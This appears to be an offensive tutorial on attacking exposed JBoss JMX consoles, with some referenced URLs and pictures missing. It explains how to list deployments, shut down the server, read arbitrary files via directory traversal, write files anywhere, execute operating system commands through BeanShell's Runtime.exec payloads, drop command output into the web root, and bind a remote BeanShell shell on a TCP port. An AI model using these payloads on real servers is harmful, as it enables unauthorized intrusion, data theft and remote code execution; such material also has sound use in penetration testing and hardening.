More JBOSS hacking

Deployed Apps Listing From jmx console use the MainDeployer agent (picture #13) direct url:

click on revoke on java.util.Collection listDeployed() item (picture #14).

Deployment Scanner

Shutdown From jmx console, go to jboss.system type=server (picture #15) direct url:

Interacting with the underlying OS Locating Server Root Directory From jmx console ServerHomeURL can be found in: jboss.system type=serverconfig direct URL:

Reading (any) File From jmx console use the SystemProperties agent: name=SystemProperties,type=Service (picture #10) direct url:

Fill the input box named URLLIST in the first table with the file you want to read, using a directory traversal URL like file://../../../../readme.txt and click on “apply changes” (picture #11). Then, to read the file readme, go to “java.util.Map showAll()” function and click on “apply”. If everything worked fine (ie, no crash or 500 Internal server error) you should have your file somewhere in the page (picture #12).

Writing a File (anywhere) From jmx console go to: name=DeploymentFileRepository, type=Service direct url:

Look for the store() method then fill the input box as follows: arg0= directory arg1= filename arg2= null arg3= url-encoded file the encoded file will be stored at: /server/default/deploy/management/directory —>> this method is vulnerable to directory traversal!

Executing Operating System Commands Jboss supports BeanShell which is an useful small “Java source interpreter”. From jmx console go to name=BSHDeployer,type=service direct url:

(picture #16) Look for the createScriptDeployment() method then fill the inputbox as follows: (picture #18) p1 = Runtime.getRuntime().exec(“touch /tmp/pippo”); p2 = “Script Name” then click “Apply”. A different syntax is needed to concatenate more command with a pipe “|” or IO redirection “<>”: Runtime.getRuntime().exec(new String[] { “/bin/sh”, “-c”, “ls -al;id;uname -a”}); The command execution is blind, to see the command output you can use this trick: redirect the command output to a file: there are few fisical location you can use to write a readable file on the wwwroot of a tomcat/jboss framework. We found that $ServerHomeURL/deploy/jmx-console.war/images/ is a good place ie: Runtime.getRuntime().exec(new String[] { “/bin/sh”, “-c”, “ls -al;id;uname -a > /jboss-4.0.2/server/default/deploy/jmx-console.war/images/logo2.txt”}); then check the results here: http://localhost:8080/jmx-console/images/logo2.txt Moreover, it’s possible to bind a BSH instance on a TCP port filling the input box as follows: p1 = import *; server (50000); p2 = “Script name” If everything went fine, you should find the shell applet either at http://localhost:50000/ or via telnet at localhost:50001 (picture #19)

Checking File Existance direct url: